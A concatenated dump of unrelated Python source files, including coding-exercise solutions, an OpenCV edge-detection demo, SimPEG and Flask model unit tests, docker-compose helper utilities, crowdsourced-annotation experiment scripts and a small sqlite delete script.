991,690 | 4f0099377cb336e4cfae51fa031f02d12c3d38d5 | '''
Input: a List of integers where every int except one shows up twice
Returns: an integer
'''
def single_number(arr):
lst = set()
for i in arr:
if i in lst:
lst.remove(i)
else:
lst.add(i)
return list(lst)[0]
if __name__ == '__main__':
# Use the main function to test your implementation
arr = [1, 1, 4, 4, 5, 5, 3, 3, 9, 0, 0]
print(f"The odd-number-out is {single_number(arr)}")
# def single_number(arr):
# s = set()
# # use either a dictionary or a set
# # sets: holding onto unique elements
# # loop through our arr
# for x in arr:
# # for each element
# # check if it is already in our set
# # if it is, then that's not our out-element-out
# if x in s:
# # remove the element from our set
# s.remove(x)
# else:
# s.add(x)
# # the odd-element-out will be the only element in the set
# return list(s)[0] |
991,691 | 63e2add369d4a92fdf5444a6e32062284c32ca98 | import cv2
import numpy as np
from matplotlib import pyplot as plt
def nothing(i):
print(i)
cv2.namedWindow("image")
cv2.createTrackbar('x',"image",0,100,nothing)
cv2.createTrackbar('y',"image",0,100,nothing)
while(True):
img = cv2.imread("media/balu_f.jpg")
img = cv2.resize(img, (960,540))
x=cv2.getTrackbarPos('x',"image")
y=cv2.getTrackbarPos('y',"image")
canny= cv2.Canny(img,x,y)
cv2.imshow("image",img)
cv2.imshow("image",canny)
k = cv2.waitKey(1)
if (k == 27):
break
cv2.destroyAllWindows() |
991,692 | 63832b43c8d58ddd5b547d8d65b0d3ac869dd5ef |
import numpy as np
t = int(input())
def match(string):
zc = sum(np.array(list(string)) == "0")
oc = sum(np.array(list(string)) == "1")
return zc == oc * oc
for k in range(t):
s = input()
c = 0
for i in range(len(s)-1):
for j in range(i+1, len(s)):
if match(s[i:j+1]):
c = c + 1
print(c)
|
991,693 | e5ab463e61fdab9c8e7653841626001b2d22486c | import unittest
import numpy as np
from SimPEG.electromagnetics import viscous_remanent_magnetization as vrm
class VRM_waveform_tests(unittest.TestCase):
def test_discrete(self):
"""
Test ensures that if all different waveform classes are used to
construct the same waveform, the characteristic decay they
produce should be the same.
"""
times = np.logspace(-4, -2, 3)
t = np.r_[-0.00200001, -0.002, -0.0000000001, 0.0]
I = np.r_[0.0, 1.0, 1.0, 0.0]
waveObj1 = vrm.waveforms.SquarePulse(delt=0.002, t0=0.0)
waveObj2 = vrm.waveforms.ArbitraryDiscrete(t_wave=t, I_wave=I)
waveObj3 = vrm.waveforms.ArbitraryPiecewise(t_wave=t, I_wave=I)
decay1b = waveObj1.getCharDecay("b", times)
decay2b = waveObj2.getCharDecay("b", times)
decay3b = waveObj3.getCharDecay("b", times)
decay1dbdt = waveObj1.getCharDecay("dbdt", times)
decay2dbdt = waveObj2.getCharDecay("dbdt", times)
decay3dbdt = waveObj3.getCharDecay("dbdt", times)
err1 = np.max(np.abs((decay2b - decay1b) / decay1b))
err2 = np.max(np.abs((decay3b - decay1b) / decay1b))
err3 = np.max(np.abs((decay2dbdt - decay1dbdt) / decay1dbdt))
err4 = np.max(np.abs((decay3dbdt - decay1dbdt) / decay1dbdt))
self.assertTrue(err1 < 0.01 and err2 < 0.01 and err3 < 0.025 and err4 < 0.01)
def test_loguniform(self):
"""
Tests to make sure log uniform decay and characteristic decay
match of the range in which the approximation is valid.
"""
times = np.logspace(-4, -2, 3)
waveObj1 = vrm.waveforms.StepOff(t0=0.0)
waveObj2 = vrm.waveforms.SquarePulse(delt=0.02)
chi0 = np.array([0.0])
dchi = np.array([0.01])
tau1 = np.array([1e-10])
tau2 = np.array([1e3])
decay1b = (dchi / np.log(tau2 / tau1)) * waveObj2.getCharDecay("b", times)
decay2b = waveObj2.getLogUniformDecay("b", times, chi0, dchi, tau1, tau2)
decay1dbdt = (dchi / np.log(tau2 / tau1)) * waveObj1.getCharDecay("dbdt", times)
decay2dbdt = waveObj1.getLogUniformDecay("dbdt", times, chi0, dchi, tau1, tau2)
decay3dbdt = (dchi / np.log(tau2 / tau1)) * waveObj2.getCharDecay("dbdt", times)
decay4dbdt = waveObj2.getLogUniformDecay("dbdt", times, chi0, dchi, tau1, tau2)
err1 = np.max(np.abs((decay2b - decay1b) / decay1b))
err2 = np.max(np.abs((decay2dbdt - decay1dbdt) / decay1dbdt))
err3 = np.max(np.abs((decay4dbdt - decay3dbdt) / decay3dbdt))
self.assertTrue(err1 < 0.01 and err2 < 0.01 and err3 < 0.01)
if __name__ == "__main__":
unittest.main()
|
991,694 | 2a2206a5d488008850b39b3448e489b3441613df | """
Test cases for Recommendations Model
"""
import logging
import unittest
import os
from service.models import Recommendation, DataValidationError, db, Type
from service import app
from .factories import RecommendationFactory
TEST_DATABASE_URI = os.getenv(
"TEST_DATABASE_URI", "postgres://postgres:postgres@localhost:5432/testdb"
)
######################################################################
# RECOMMENDATIONS M O D E L T E S T C A S E S
######################################################################
class TestRecommendationModel(unittest.TestCase):
""" Test Cases for Recommendations Model """
@classmethod
def setUpClass(cls):
"""This runs once before the entire test suite"""
app.config["TESTING"] = True
app.config["DEBUG"] = False
app.config["SQLALCHEMY_DATABASE_URI"] = TEST_DATABASE_URI
app.logger.setLevel(logging.CRITICAL)
Recommendation.init_db(app)
@classmethod
def tearDownClass(cls):
""" This runs once after the entire test suite """
pass
def setUp(self):
""" This runs before each test """
db.drop_all() # clean up the last tests
db.create_all() # make our sqlalchemy tables
def tearDown(self):
""" This runs after each test """
db.session.remove()
db.drop_all()
######################################################################
# T E S T C A S E S
######################################################################
def test_create_a_recommendation(self):
""" Test create a recommendation """
recommendation = Recommendation(product_id=1, recommendation_product_id=2, relationship=Type.UP_SELL)
self.assertTrue(recommendation != None)
self.assertEquals(recommendation.relationship, Type.UP_SELL)
self.assertEquals(recommendation.product_id, 1)
self.assertEquals(recommendation.recommendation_product_id, 2)
def test_create_a_recommendation_missing_data(self):
""" Test create a recommendation """
recommendation = Recommendation(product_id=1, recommendation_product_id=None, relationship=Type.UP_SELL)
self.assertRaises(DataValidationError,recommendation.create)
def test_delete_a_recommendation(self):
""" Delete a recommendation from the database """
recommendation = RecommendationFactory()
recommendation.create()
self.assertEqual(len(Recommendation.all()), 1)
recommendation.delete()
self.assertEqual(len(Recommendation.all()), 0)
def test_serialize_a_recommendation(self):
""" Test serialization of a Recommendation """
recommendation = Recommendation(product_id=1, recommendation_product_id=2, relationship=Type.UP_SELL)
data = recommendation.serialize()
self.assertNotEqual(data, None)
self.assertIn("product_id", data)
self.assertEqual(data["product_id"], recommendation.product_id)
self.assertIn("recommendation_product_id", data)
self.assertEqual(data["recommendation_product_id"], recommendation.recommendation_product_id)
self.assertIn("relationship", data)
self.assertEqual(data["relationship"], recommendation.relationship.name)
def test_deserialize_a_recommendation(self):
""" Test deserialization of a Recommendation """
data = {
"product_id": 1,
"recommendation_product_id": 2,
"relationship": Type.UP_SELL
}
recommendation = Recommendation()
recommendation.deserialize(data)
self.assertNotEqual(recommendation, None)
self.assertEqual(recommendation.product_id, 1)
self.assertEqual(recommendation.recommendation_product_id, 2)
self.assertEqual(recommendation.relationship, Type.UP_SELL)
def test_deserialize_missing_data(self):
""" Test deserialization of a Recommendation with missing data """
data = {"product_id": 1}
recommendation = Recommendation()
self.assertRaises(DataValidationError, recommendation.deserialize, data)
def test_deserialize_bad_data(self):
""" Test deserialization of bad data """
data = "this is not a dictionary"
recommendation = Recommendation()
self.assertRaises(DataValidationError, recommendation.deserialize, data)
def test_list_recommendation(self):
"""Test list recommendations"""
recommendations = RecommendationFactory.create_batch(1)
for recommendation in recommendations:
recommendation.create()
logging.debug(recommendations)
# log data
self.assertEqual(len(recommendation.all()),1)
def test_find_recommendation_type(self):
"""Find a recommendation type by two product ids"""
recommendations = RecommendationFactory.create_batch(1)
for recommendation in recommendations:
recommendation.create()
logging.debug(recommendations)
# find the recommendation in the list
recommendation = Recommendation.find(recommendations[0].product_id, recommendations[0].recommendation_product_id)
self.assertIsNot(recommendation, None)
self.assertEqual(recommendation.product_id, recommendations[0].product_id)
self.assertEqual(recommendation.recommendation_product_id, recommendations[0].recommendation_product_id)
self.assertEqual(recommendation.relationship, recommendations[0].relationship)
def test_update_a_recommendation(self):
"""Update a recommendation type by two product ids"""
recommendation = RecommendationFactory()
logging.debug(recommendation)
recommendation.create()
logging.debug(recommendation)
logging.debug(type(recommendation.relationship.name))
recommendation.relationship = Type.CROSS_SELL
recommendation.update()
self.assertIsNot(recommendation, None)
self.assertEqual(recommendation.relationship.name, 'CROSS_SELL')
recommendations = recommendation.all()
self.assertEqual(len(recommendations), 1)
self.assertEqual(recommendations[0].product_id, recommendation.product_id)
self.assertEqual(recommendations[0].recommendation_product_id, recommendation.recommendation_product_id)
self.assertEqual(recommendations[0].relationship, recommendation.relationship)
def test_update_a_recommendation_no_relationship(self):
"""Update a recommendation type by two product ids without relationship"""
recommendation = RecommendationFactory()
logging.debug(recommendation)
recommendation.create()
logging.debug(recommendation)
recommendation.relationship = None
self.assertRaises(DataValidationError, recommendation.update)
def test_find_recommendation_by_id_and_type(self):
"""Find a recommendation type by product id and relationship id"""
query_id = 1
query_type = Type.UP_SELL
recommendations = [Recommendation(product_id = query_id, recommendation_product_id = 2, relationship = query_type),
Recommendation(product_id = query_id, recommendation_product_id = 10, relationship = query_type),
Recommendation(product_id = query_id, recommendation_product_id = 15, relationship = Type.ACCESSORY)]
for recommendation in recommendations:
recommendation.create()
logging.debug(recommendations)
# find the 2nd recommendation in the list
results = Recommendation.find_by_id_and_type(query_id, Type.UP_SELL)
for recommendation in results:
self.assertIsNot(recommendation, None)
self.assertEqual(recommendation.product_id, query_id)
self.assertEqual(recommendation.relationship, query_type)
def test_update_a_recommendation_likes(self):
"""Like a recommendation"""
recommendation = RecommendationFactory()
recommendation.create()
self.assertEquals(recommendation.likes, 0)
recommendation.likes += 1
recommendation.update()
self.assertEqual(recommendation.likes, 1)
def test_clear_data(self):
'''Clear all data entries'''
recommendations = RecommendationFactory.create_batch(1)
for recommendation in recommendations:
recommendation.create()
self.assertEqual(len(Recommendation.all()), 1)
Recommendation.clear()
self.assertEqual(len(Recommendation.all()), 0)
|
991,695 | c1cb1a8d764cff27cf807edb91dbe3bbd2d2c376 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/6/21 23:47
# @Author : SNCKnight
# @File : 08_operator_precedence.py
# @Software: PyCharm
"""运算符优先级
一般用()控制运算优先级
** 指数 (最高优先级)
~ + - 按位翻转, 一元加号和减号 (最后两个的方法名为 +@ 和 -@)
* / % // 乘,除,取模和取整除
+ - 加法减法
>> << 右移,左移运算符
& 位 'AND'
^ | 位运算符
<= < > >= 比较运算符
<> == != 等于运算符
= %= /= //= -= += *= **= 赋值运算符
is is not 身份运算符
in not in 成员运算符
and or not 逻辑运算符
"""
|
991,696 | 266f25c98379fe914fd1d928316bfd4afa129878 | """
Copyright 2021 Adobe
All Rights Reserved.
NOTICE: Adobe permits you to use, modify, and distribute this file in accordance
with the terms of the Adobe license agreement accompanying it.
"""
import contextlib
import re
import socket
import subprocess
import time
import requests
import yaml
from . import config, log
def check_docker_network():
log.get_logger().debug(f'Checking for docker network {config.get_dc_network()}')
exit_code = subprocess.call(
['docker', 'network', 'inspect', config.get_dc_network()],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
if exit_code:
log.get_logger().info(f'Creating docker network {config.get_dc_network()}')
subprocess.check_call(
['docker', 'network', 'create', config.get_dc_network()],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
def get_open_ports(container_name):
"""
Retrieves the open ports on a container.
:param container_name:
:return: The open ports as a dictionary of container ports to host ports
"""
try:
lines = subprocess.check_output(['docker', 'port', container_name]).splitlines()
ports = {}
for line in lines:
match = re.match(r'^(\d+)/tcp -> 0.0.0.0:(\d+)$', line.strip().decode('utf-8'))
if not match:
continue
ports[int(match.group(1))] = int(match.group(2))
return ports
except subprocess.CalledProcessError:
log.get_logger().warning(
f'Could not find open ports for {container_name}, please ensure it is configured correctly'
)
return []
def is_port_open(port):
"""
Checks if the port is open on localhost by creating a socket connection to it.
:param port: The port as a number
:return: True if open, false otherwise
"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
return sock.connect_ex(('127.0.0.1', port)) == 0
def _is_path_responding(port: int, path: str) -> bool:
with contextlib.suppress(Exception):
return requests.get(f'http://localhost:{port}{path}').status_code == 200
def check_port(container_name: str, port: int, path: str) -> None:
total_time = 0.1
while not _is_path_responding(port, path):
message = f'Container {container_name} is not yet up, sleeping...'
if (total_time % 3) == 0:
log.get_logger().info(message)
else:
log.get_logger().debug(message)
total_time += 0.1
time.sleep(0.1)
def read_services_from_dc(docker_compose_path: str):
with open(docker_compose_path, encoding='utf8') as fobj:
data = yaml.safe_load(fobj)
services = data.get('services', {})
return services.keys()
|
991,697 | b3af7f087e2c15d0eb147ea759e14abe5bf8415d | import sys, os
ROOT_FOLDER = os.path.dirname(
os.path.dirname(
os.path.abspath(__file__)))
sys.path.insert(0, ROOT_FOLDER)
from pipelines import data_curation
from launchers import data_update_launcher
def main():
data_update_launcher.main()
print("Running data curation pipeline")
data_curation.main()
if __name__ == '__main__':
main()
|
991,698 | 69655a4ab2aec09b6d12726053d358c397891b8f | '''
Created on April 27, 2018
@author: Edwin Simpson
'''
import os
import evaluation.experiment
from evaluation.experiment import Experiment
import data.load_data as load_data
import numpy as np
regen_data = False
gt, annos, doc_start, features, gt_val, _, _, _ = load_data.load_biomedical_data(regen_data)
# , debug_subset_size=1000) # include this argument to debug with small dataset
# ------------------------------------------------------------------------------------------------
# only hmm_Crowd actually uses these hyperparameters
beta0_factor = 0.1
alpha0_diags = 0.1
alpha0_factor = 0.1
output_dir = os.path.join(evaluation.experiment.output_root_dir, 'pico3')
exp = Experiment(output_dir, 3, annos, gt, doc_start, features, annos, gt_val, doc_start, features,
alpha0_factor=alpha0_factor, alpha0_diags=alpha0_diags, beta0_factor=beta0_factor, max_iter=20)
# # run all the methods that don't require tuning here
exp.methods = [
'best',
'worst',
'majority',
'ds',
'mace',
'HMM_crowd',
]
# this will run task 1 -- train on all crowdsourced data, test on the labelled portion thereof
exp.run_methods(new_data=regen_data)
# ------------------------------------------------------------------------------------------------
beta0_factor = 0.1
alpha0_diags = 10
alpha0_factor = 1
output_dir = os.path.join(evaluation.experiment.output_root_dir, 'pico3_%f_%f_%f' % (beta0_factor, alpha0_diags,
alpha0_factor))
exp = Experiment(output_dir, 3, annos, gt, doc_start, features, annos, gt_val, doc_start, features,
alpha0_factor=alpha0_factor, alpha0_diags=alpha0_diags, beta0_factor=beta0_factor, max_iter=20)
# # run all the methods that don't require tuning here
exp.methods = [
'ibcc',
]
# this will run task 1 -- train on all crowdsourced data, test on the labelled portion thereof
exp.run_methods(new_data=regen_data)
# ------------------------------------------------------------------------------------------------
beta0_factor = 0.1
alpha0_diags = 0.1
alpha0_factor = 0.1
output_dir = os.path.join(evaluation.experiment.output_root_dir, 'pico3_%f_%f_%f' % (beta0_factor, alpha0_diags,
alpha0_factor))
exp = Experiment(output_dir, 3, annos, gt, doc_start, features, annos, gt_val, doc_start, features,
alpha0_factor=alpha0_factor, alpha0_diags=alpha0_diags, beta0_factor=beta0_factor,
max_iter=20)
# run all the methods that don't require tuning here
exp.methods = [
'bsc_acc_integrateIF',
]
# this will run task 1 -- train on all crowdsourced data, test on the labelled portion thereof
exp.run_methods(new_data=regen_data)
# ------------------------------------------------------------------------------------------------
beta0_factor = 0.1
alpha0_diags = 10
alpha0_factor = 1
output_dir = os.path.join(evaluation.experiment.output_root_dir, 'pico3_%f_%f_%f' % (beta0_factor, alpha0_diags,
alpha0_factor))
exp = Experiment(output_dir, 3, annos, gt, doc_start, features, annos, gt_val, doc_start, features,
alpha0_factor=alpha0_factor, alpha0_diags=alpha0_diags, beta0_factor=beta0_factor,
max_iter=20)
# run all the methods that don't require tuning here
exp.methods = [
'bsc_spam_integrateIF',
]
# this will run task 1 -- train on all crowdsourced data, test on the labelled portion thereof
exp.run_methods(new_data=regen_data)
# ------------------------------------------------------------------------------------------------
beta0_factor = 0.1 # 0.01
alpha0_diags = 1.0 # 0.1
alpha0_factor = 0.1 # 0.1
output_dir = os.path.join(evaluation.experiment.output_root_dir, 'pico3_%f_%f_%f' % (beta0_factor, alpha0_diags,
alpha0_factor))
exp = Experiment(output_dir, 3, annos, gt, doc_start, features, annos, gt_val, doc_start, features,
alpha0_factor=alpha0_factor, alpha0_diags=alpha0_diags, beta0_factor=beta0_factor,
max_iter=20)
# run all the methods that don't require tuning here
exp.methods = [
'bsc_cv_integrateIF',
]
# this will run task 1 -- train on all crowdsourced data, test on the labelled portion thereof
exp.run_methods(new_data=regen_data)
# ------------------------------------------------------------------------------------------------
beta0_factor = 0.1
alpha0_diags = 1.0
alpha0_factor = 10.0
output_dir = os.path.join(evaluation.experiment.output_root_dir, 'pico3_%f_%f_%f' % (beta0_factor, alpha0_diags,
alpha0_factor))
exp = Experiment(output_dir, 3, annos, gt, doc_start, features, annos, gt_val, doc_start, features,
alpha0_factor=alpha0_factor, alpha0_diags=alpha0_diags, beta0_factor=beta0_factor,
max_iter=20)
# run all the methods that don't require tuning here
exp.methods = [
'bsc_cm_integrateIF',
]
# this will run task 1 -- train on all crowdsourced data, test on the labelled portion thereof
exp.run_methods(new_data=regen_data)
# ------------------------------------------------------------------------------------------------
beta0_factor = 1
alpha0_diags = 10
alpha0_factor = 10
best_begin_factor = 10
output_dir = os.path.join(evaluation.experiment.output_root_dir, 'pico3_%f_%f_%f' % (beta0_factor, alpha0_diags,
alpha0_factor))
exp = Experiment(output_dir, 3, annos, gt, doc_start, features, annos, gt_val, doc_start, features,
alpha0_factor=alpha0_factor, alpha0_diags=alpha0_diags, beta0_factor=beta0_factor,
max_iter=20, begin_factor=best_begin_factor)
# run all the methods that don't require tuning here
exp.methods = [
'bsc_seq_integrateIF',
]
# this will run task 1 -- train on all crowdsourced data, test on the labelled portion thereof
exp.run_methods(new_data=regen_data)
# ------------------------------------------------------------------------------------------------
beta0_factor = 1
alpha0_diags = 1
alpha0_factor = 1
best_begin_factor = 10
output_dir = os.path.join(evaluation.experiment.output_root_dir, 'pico3_%f_%f_%f' % (beta0_factor, alpha0_diags,
alpha0_factor))
exp = Experiment(output_dir, 3, annos, gt, doc_start, features, annos, gt_val, doc_start, features,
alpha0_factor=alpha0_factor, alpha0_diags=alpha0_diags, beta0_factor=beta0_factor,
max_iter=20, begin_factor=best_begin_factor)
# run all the methods that don't require tuning here
exp.methods = [
'bsc_seq', # no word features
]
# this will run task 1 -- train on all crowdsourced data, test on the labelled portion thereof
exp.run_methods(new_data=regen_data)
# ------------------------------------------------------------------------------------------------
beta0_factor = 1
alpha0_diags = 10
alpha0_factor = 0.1
best_begin_factor = 10
output_dir = os.path.join(evaluation.experiment.output_root_dir, 'pico3_%f_%f_%f' % (beta0_factor, alpha0_diags,
alpha0_factor))
exp = Experiment(output_dir, 3, annos, gt, doc_start, features, annos, gt_val, doc_start, features,
alpha0_factor=alpha0_factor, alpha0_diags=alpha0_diags, beta0_factor=beta0_factor,
max_iter=20, begin_factor=best_begin_factor)
# run all the methods that don't require tuning here
exp.methods = [
'bsc_seq_integrateIF_noHMM'
]
# this will run task 1 -- train on all crowdsourced data, test on the labelled portion thereof
exp.run_methods(new_data=regen_data)
# ------------------------------------------------------------------------------------------------
beta0_factor = 1
alpha0_diags = 10
alpha0_factor = 10
output_dir = os.path.join(evaluation.experiment.output_root_dir, 'pico3_%f_%f_%f' % (beta0_factor, alpha0_diags,
alpha0_factor))
exp = Experiment(output_dir, 3, annos, gt, doc_start, features, annos, gt_val, doc_start, features,
alpha0_factor=alpha0_factor, alpha0_diags=alpha0_diags, beta0_factor=beta0_factor,
max_iter=20)
# run all the methods that don't require tuning here
exp.methods = [
'bsc_cm', # no word features
]
# this will run task 1 -- train on all crowdsourced data, test on the labelled portion thereof
exp.run_methods(new_data=regen_data)
# ------------------------------------------------------------------------------------------------
beta0_factor = 0.1
alpha0_diags = 10
alpha0_factor = 0.1
output_dir = os.path.join(evaluation.experiment.output_root_dir, 'pico3_%f_%f_%f' % (beta0_factor, alpha0_diags,
alpha0_factor))
exp = Experiment(output_dir, 3, annos, gt, doc_start, features, annos, gt_val, doc_start, features,
alpha0_factor=alpha0_factor, alpha0_diags=alpha0_diags, beta0_factor=beta0_factor,
max_iter=20)
# run all the methods that don't require tuning here
exp.methods = [
'bsc_cm_integrateIF_noHMM', # no word features
]
# this will run task 1 -- train on all crowdsourced data, test on the labelled portion thereof
exp.run_methods(new_data=regen_data)
# # ------------------------------------------------------------------------------------------------
# # tune with small dataset to save time
# s = 300
# idxs = np.argwhere(gt_val != -1)[:, 0] # for tuning
# ndocs = np.sum(doc_start[idxs])
#
# if ndocs > s:
# idxs = idxs[:np.argwhere(np.cumsum(doc_start[idxs]) == s)[0][0]]
# elif ndocs < s: # not enough validation data
# moreidxs = np.argwhere(gt != -1)[:, 0]
# deficit = s - ndocs
# ndocs = np.sum(doc_start[moreidxs])
# if ndocs > deficit:
# moreidxs = moreidxs[:np.argwhere(np.cumsum(doc_start[moreidxs]) == deficit)[0][0]]
# idxs = np.concatenate((idxs, moreidxs))
#
# tune_annos = annos[idxs]
# tune_doc_start = doc_start[idxs]
# tune_text = features[idxs]
# gt_val = gt_val[idxs]
#
# beta_factors = [0.1, 1]
# diags = [0.1, 1, 10]
# factors = [0.1, 1, 10]
#
# methods_to_tune = [
# # 'ibcc',
# # 'bsc_acc_integrateIF',
# # 'bsc_mace_integrateIF',
# # 'bsc_vec_integrateIF',
# # 'bsc_ibcc_integrateIF',
# ]
# output_dir = os.path.join(evaluation.experiment.output_root_dir, 'pico')
# exp = Experiment(output_dir, 3, annos, gt, doc_start, features, tune_annos, gt_val, tune_doc_start, tune_text,
# max_iter=20, begin_factor=10)
#
# for m, method in enumerate(methods_to_tune):
# print('TUNING %s' % method)
#
# best_scores = exp.tune_alpha0(diags, factors, beta_factors, method, metric_idx_to_optimise=11)
# best_idxs = best_scores[1:].astype(int)
#
# exp.beta0_factor = beta_factors[best_idxs[0]]
# exp.alpha0_diags = diags[best_idxs[1]]
# exp.alpha0_factor = factors[best_idxs[2]]
#
# print('Best values: %f, %f, %f' % (exp.beta0_factor, exp.alpha0_diags, exp.alpha0_factor))
#
# # this will run task 1 -- train on all crowdsourced data, test on the labelled portion thereof
# exp.methods = [method]
# exp.run_methods(new_data=regen_data)
|
991,699 | c671d01e0b7cee73fba1f757e891cb7440b6e3bd | import sqlite3
connection = sqlite3.connect('databaseContratos.db')
c = connection.cursor()
def DELETE(codigo):
c.execute("DELETE FROM CONTRATO WHERE codigo=:codigo", {'codigo': codigo})
c.execute("SELECT * FROM CONTRATO")
print(c.fetchall())
connection.commit()
connection.close()
codigo = "a"
DELETE(codigo) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.